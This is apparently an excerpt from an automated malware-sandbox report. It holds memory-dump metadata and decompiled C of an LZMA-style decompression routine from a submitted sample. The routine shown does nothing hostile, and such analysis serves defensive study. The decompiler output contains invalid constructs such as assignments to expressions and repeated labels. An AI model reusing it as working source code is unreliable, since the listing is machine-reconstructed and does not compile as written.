                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x0040722d
                          0x00407462
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00407499
                          0x00407499
                          0x00000000
                          0x00407499
                          0x004072e6
                          0x0040726d
                          0x0040726a
                          0x00000000
                          0x00406fbf

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                          • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                          • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                          • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406F07() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xa;
                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                          					} else {
                          						 *(__ebp - 0x84) = 9;
                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          					}
                          					while(1) {
                          						 *(_t613 - 0x54) = _t606;
                          						while(1) {
                          							L133:
                          							_t531 =  *_t606;
                          							_t589 = _t531 & 0x0000ffff;
                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          							if( *(_t613 - 0xc) >= _t565) {
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          								 *(_t613 - 0x40) = 1;
                          								_t532 = _t531 - (_t531 >> 5);
                          								 *_t606 = _t532;
                          							} else {
                          								 *(_t613 - 0x10) = _t565;
                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          							}
                          							if( *(_t613 - 0x10) >= 0x1000000) {
                          								goto L139;
                          							}
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								L170:
                          								_t568 = 0x22;
                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          								_t535 = 0;
                          								L172:
                          								return _t535;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L139:
                          							_t533 =  *(_t613 - 0x84);
                          							while(1) {
                          								 *(_t613 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t613 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                          										case 0:
                          											if( *(_t613 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t534 =  *( *(_t613 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t570);
                          											_push(9);
                          											_pop(_t571);
                          											_t609 = _t538 / _t570;
                          											_t540 = _t538 % _t570 & 0x000000ff;
                          											asm("cdq");
                          											_t604 = _t540 % _t571 & 0x000000ff;
                          											 *(_t613 - 0x3c) = _t604;
                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          												L10:
                          												if(_t612 == 0) {
                          													L12:
                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t612 = _t612 - 1;
                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          												} while (_t612 != 0);
                          												goto L12;
                          											}
                          											if( *(_t613 - 4) != 0) {
                          												GlobalFree( *(_t613 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t613 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t45 = _t613 - 0x48;
                          											 *_t45 =  *(_t613 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t613 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t613 - 0x40);
                          											if(_t546 ==  *(_t613 - 0x74)) {
                          												L20:
                          												 *(_t613 - 0x48) = 5;
                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t613 - 0x74) = _t546;
                          											if( *(_t613 - 8) != 0) {
                          												GlobalFree( *(_t613 - 8)); // executed
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          											 *(_t613 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          											 *(_t613 - 0x84) = 6;
                          											 *(_t613 - 0x4c) = _t553;
                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          											 *(_t613 - 0x54) = _t606;
                          											goto L133;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											_t67 = _t613 - 0x70;
                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          											if( *(_t613 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t606;
                          											_t589 = _t531 & 0x0000ffff;
                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          											if( *(_t613 - 0xc) >= _t565) {
                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          												 *(_t613 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												 *_t606 = _t532;
                          											} else {
                          												 *(_t613 - 0x10) = _t565;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          											}
                          											if( *(_t613 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											}
                          										case 5:
                          											goto L137;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 8:
                          											goto L0;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L89;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t258;
                          											0 | _t258 = _t258 + _t258 + 9;
                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          											goto L75;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L88;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L88:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L89:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 0x12:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *(__ebp - 0x7c) = 0x14;
                          												goto L145;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											 *(_t613 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											L145:
                          											__eax =  *(__ebp - 0x40);
                          											 *(__ebp - 0x50) = 1;
                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          											goto L149;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
